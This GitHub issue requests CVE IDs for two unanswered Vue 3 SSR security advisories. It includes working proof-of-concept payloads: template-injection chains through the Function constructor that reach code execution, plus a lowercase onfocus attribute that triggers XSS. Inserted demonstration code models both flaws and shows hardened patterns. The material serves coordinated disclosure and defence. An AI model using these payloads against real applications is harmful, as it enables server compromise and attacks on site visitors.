
Request CVE ID assignment for two Vue 3 SSR vulnerabilities (vendor non-response 49d / 47d) #7718

@sgInnora


Summary

I am requesting GitHub (as a CVE Numbering Authority) to assign CVE IDs for two security advisories I filed against vuejs/core that have remained in triage state without vendor engagement for 47-49 days, well beyond the typical responsible disclosure response window.

Affected Advisories

  1. GHSA-pw74-q32p-x99f — Remote Code Execution via Server-Side Template Injection in SSR Runtime Compiler (this keyword bypass)

  2. GHSA-5w45-w79q-rpqq — Cross-Site Scripting via isOn() case-sensitivity bypass in SSR event handler filtering (regression of CVE-2018-6341)

Prior Disclosure Attempts

For GHSA-pw74-q32p-x99f:

  • 2026-03-25: Reported to security@vuejs.org (with full report + PoC as .md attachment)
  • 2026-03-25: MITRE ticket #2014701 submitted
  • 2026-03-29: 4 days no response → GHSA PVR filed

For GHSA-5w45-w79q-rpqq:

  • 2026-03-25: Reported to security@vuejs.org (with full report)
  • 2026-03-25: MITRE ticket #2013988 submitted
  • 2026-03-31: Final notice sent (7-day deadline 4/1)
  • 2026-04-01: No response → GHSA PVR filed

Vendor Response Status

Vue.js has not engaged with either advisory:

  • No comments from vuejs/core maintainers on either GHSA
  • submission.accepted = false on both
  • No fix commits referencing the reported issues
  • No release notes mentioning the vulnerabilities

Why CVE Assignment Is Needed Now

  1. 90-day responsible disclosure deadline: 2026-06-23 (per RFC standard practice, 37 days from today). Public disclosure should be coordinated with proper CVE identifiers.
  2. CVSS 10.0 RCE is actively exploitable: Vue.js SSR + user-controlled template content (CMS / low-code builders / multi-tenant SaaS) has zero protection against the this.__proto__.constructor chain.
  3. Downstream coordination: Nuxt.js, Vite SSR, custom SSR consumers need CVE IDs to coordinate their own advisory and patch release.
  4. Indexed in threat intel: Without CVE IDs, GHSA cannot be referenced in standard security databases (NVD, OSV, etc.), reducing detection coverage.

Technical Summaries

GHSA-pw74-q32p-x99f (RCE 10.0)

Vue 3's SSR runtime template compiler executes compiled template code via Function() constructor without effective sandboxing. The prefixIdentifiers: true option rewrites Identifier AST nodes (foo → _ctx.foo) but does NOT rewrite ThisExpression nodes.

PoC:

// Runs as an ES module (top-level await). The Node build of `vue` bundles the
// runtime template compiler, which is what compiles the `template` option here.
import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'

const userInput = "{{ this.__proto__.constructor.constructor('return process.version')() }}"
const app = createSSRApp({ template: `<div>${userInput}</div>` })
const html = await renderToString(app)
console.log(html) // <div>v22.22.1</div> — process.version leaked!

Alternative chains:

  • {{ ''['constructor']['constructor']('return process.version')() }} (no this needed)
  • Full RCE via process.binding('spawn_sync') for arbitrary command execution

Verified on: Vue 3.5.30 (latest at time of report) + Node.js v22.22.1. 5/5 PoC chains confirmed. 3-LLM cross-validation (Claude/Gemini/Kimi-K2) rated CVSS 10.0.
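To make the mechanism above concrete without a Vue install, here is an added example; it is not code from the report or from vuejs/core. It imitates the prefixIdentifiers pass with a token-level rewrite (Vue's compiler works on a Babel AST), feeds the result to the Function constructor with the component context as both `this` and `_ctx`, and shows that free identifiers are redirected while `this`, string literals and property chains are not. The function names (evaluateInterpolation, renderUserContentAsTemplate, renderUserContentSafely) are hypothetical, and the payloads return globalThis rather than process.version so the result does not depend on the host runtime. The hardened half shows the fix a consumer controls: keep the template fixed and bind user text as data.

```javascript
// Added example, not Vue's code: a toy model of why prefixing free identifiers
// is not a sandbox. Vue's prefixIdentifiers pass works on a Babel AST; here it
// is imitated with a token-level rewrite that is good enough for expressions.

// Identifiers that must not be rewritten (language keywords and literals).
const KEYWORDS = new Set([
  'this', 'typeof', 'return', 'true', 'false', 'null', 'undefined',
  'new', 'in', 'instanceof', 'void',
]);

// Tokens: string literals (kept as-is), `.name` member accesses (kept),
// bare identifiers (prefixed with `_ctx.` unless they are keywords).
const TOKEN_RE =
  /'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"|\.\s*[A-Za-z_$][\w$]*|[A-Za-z_$][\w$]*/g;

function prefixIdentifiers(expr) {
  return expr.replace(TOKEN_RE, (tok) => {
    if (tok[0] === "'" || tok[0] === '"' || tok[0] === '.') return tok;
    return KEYWORDS.has(tok) ? tok : `_ctx.${tok}`;
  });
}

// Model of the render step the report describes: the rewritten expression is
// compiled with the Function constructor and invoked with the component
// context as both `this` and `_ctx`. Free identifiers now resolve on `_ctx`,
// but `this`, string literals and property chains are untouched, and the
// Function constructor reached through them evaluates in global scope.
function evaluateInterpolation(expr, ctx) {
  const code = prefixIdentifiers(expr);
  const fn = new Function('_ctx', `return (${code})`);
  return fn.call(ctx, ctx);
}

function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Unsafe pattern from the report, modelled: the user string is spliced into
// the template source, so any {{ }} inside it is compiled and executed.
function renderUserContentAsTemplate(userInput, ctx) {
  const template = `<div>${userInput}</div>`;
  return template.replace(/\{\{\s*([\s\S]*?)\s*\}\}/g, (_, expr) =>
    escapeHtml(evaluateInterpolation(expr, ctx)));
}

// Hardened pattern: the template is fixed and trusted, the user string is
// bound as data and only reaches the output as escaped text. This is what
// `<div>{{ content }}</div>` with `content` in the component's data does.
function renderUserContentSafely(userInput) {
  return `<div>${escapeHtml(userInput)}</div>`;
}

// Constructed payloads for the demonstration. They return globalThis instead
// of process.version so the result does not depend on the host runtime.
const PAYLOAD_THIS =
  "typeof this.__proto__.constructor.constructor('return globalThis')()";
const PAYLOAD_LITERAL =
  "typeof ''['constructor']['constructor']('return globalThis')()";

function demo() {
  const ctx = { msg: 'hello' };
  return {
    legit: evaluateInterpolation('msg.length', ctx),           // 5
    prefixed: evaluateInterpolation('typeof globalThis', ctx), // 'undefined'
    viaThis: evaluateInterpolation(PAYLOAD_THIS, ctx),         // 'object'
    viaLiteral: evaluateInterpolation(PAYLOAD_LITERAL, ctx),   // 'object'
    unsafe: renderUserContentAsTemplate(`{{ ${PAYLOAD_THIS} }}`, ctx),
    safe: renderUserContentSafely(`{{ ${PAYLOAD_THIS} }}`),
  };
}
```

The `prefixed` case shows what identifier prefixing does buy: a bare `globalThis` (or `process`) becomes `_ctx.globalThis` and resolves to undefined. The two payload cases show why that is not a sandbox: nothing in them is a free identifier, so nothing is rewritten, and the Function constructor they reach runs in global scope. The only robust control on the consumer side is the one in renderUserContentSafely: user content is data, never template source.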

GHSA-5w45-w79q-rpqq (XSS 7.2)

packages/shared/src/general.ts isOn() utility only recognizes camelCase event names (onClick) but not HTML-standard lowercase (onclick), enabling XSS injection.

// packages/shared/src/general.ts (as quoted in the report)
export const isOn = (key: string): boolean =>
  key.charCodeAt(0) === 111 /* o */ &&
  key.charCodeAt(1) === 110 /* n */ &&
  (key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97) // true for any 3rd char outside a-z (uppercase, digits, symbols); false for lowercase

The check (charCode > 122 || charCode < 97) matches characters outside a-z only. This identifies onClick (C=67) but misses onclick (c=99).

This is a regression of CVE-2018-6341 (Vue 2 SSR XSS, fixed in v2.5.17). Vue 3 reimplemented the protection using isOn() but introduced a case-sensitivity blind spot.

PoC: v-bind="{ autofocus: '', onfocus: 'evil()' }" produces <input autofocus onfocus="evil()"> which auto-triggers on page load — zero-interaction XSS.

21/21 standard DOM event handlers bypass isOn() in lowercase form.
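The following is an added example, not code from the report or from vuejs/core. It reproduces the isOn() predicate quoted above, models the attribute-rendering gate the report describes (simplified: no boolean, class or style handling and no unsafe-name check), and adds a consumer-side guard that drops handler names regardless of case before a user-controlled object reaches v-bind. The names renderAttrs, handlersMissedByIsOn and sanitizeAttrs are hypothetical helpers, and the handler list is a constructed sample, not the report's 21.

```javascript
// Added example, not vuejs/core code: the isOn() predicate as quoted in the
// report, a minimal model of the SSR attribute rendering it gates, and a
// consumer-side guard that rejects handler names regardless of case.

// The predicate as quoted above from packages/shared/src/general.ts.
const isOn = (key) =>
  key.charCodeAt(0) === 111 /* o */ &&
  key.charCodeAt(1) === 110 /* n */ &&
  (key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97);

// Simplified model of server-side attribute rendering: props recognised as
// listeners by isOn() are skipped, everything else becomes an attribute.
// Boolean, class and style handling and the unsafe-attribute-name check are
// left out; only the isOn() gate matters here.
function renderAttrs(props) {
  let out = '';
  for (const [key, value] of Object.entries(props)) {
    if (isOn(key)) continue;
    out += value === ''
      ? ` ${key}`
      : ` ${key}="${String(value).replace(/&/g, '&amp;').replace(/"/g, '&quot;')}"`;
  }
  return out;
}

// Which names in a list slip past isOn()? Used below with a constructed
// sample of lowercase handler names.
function handlersMissedByIsOn(names) {
  return names.filter((name) => !isOn(name));
}

// Consumer-side guard (hypothetical helper) for attribute objects built from
// user input: drop every key that names an inline event handler, whatever
// its case. Apply it before the object reaches v-bind.
const EVENT_HANDLER_RE = /^on/i;
function sanitizeAttrs(props) {
  const clean = {};
  for (const [key, value] of Object.entries(props)) {
    if (EVENT_HANDLER_RE.test(key)) continue;
    clean[key] = value;
  }
  return clean;
}

// Constructed sample input mirroring the report's PoC object.
const USER_ATTRS = { autofocus: '', onfocus: 'evil()' };
const SAMPLE_LOWERCASE_HANDLERS = [
  'onclick', 'onfocus', 'onload', 'onerror', 'onmouseover', 'onkeydown',
];

function demo() {
  return {
    camel: isOn('onClick'),                                  // true
    lower: isOn('onclick'),                                  // false
    rendered: `<input${renderAttrs(USER_ATTRS)}>`, // <input autofocus onfocus="evil()">
    missed: handlersMissedByIsOn(SAMPLE_LOWERCASE_HANDLERS), // all six
    hardened: `<input${renderAttrs(sanitizeAttrs(USER_ATTRS))}>`, // <input autofocus>
  };
}
```

A denylist on `/^on/i` is the minimum; where the set of attributes a user may set is known, an allowlist of permitted names (and a check that values are plain strings) is the safer guard, since it does not depend on enumerating every handler the browser recognises.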

Request

Please assign two CVE IDs (one per GHSA) under GitHub's CNA authority, given:

  • Vendor non-response > 47 days
  • Critical severity (one CVSS 10.0)
  • 90-day responsible disclosure deadline approaching
  • Affected ecosystem (Vue 3 SSR — Nuxt.js, Vite SSR, custom SSR)

Reporter

  • GitHub: @sgInnora
  • Affiliation: Independent security research (cve1000 project)
  • Contact: via GitHub or feng@innora.ai

Verification

Both advisories are filed and visible via:

gh api 'repos/vuejs/core/security-advisories/GHSA-pw74-q32p-x99f'
gh api 'repos/vuejs/core/security-advisories/GHSA-5w45-w79q-rpqq'

Both return state: triage, submission.accepted: false, cve_id: null as of 2026-05-17.
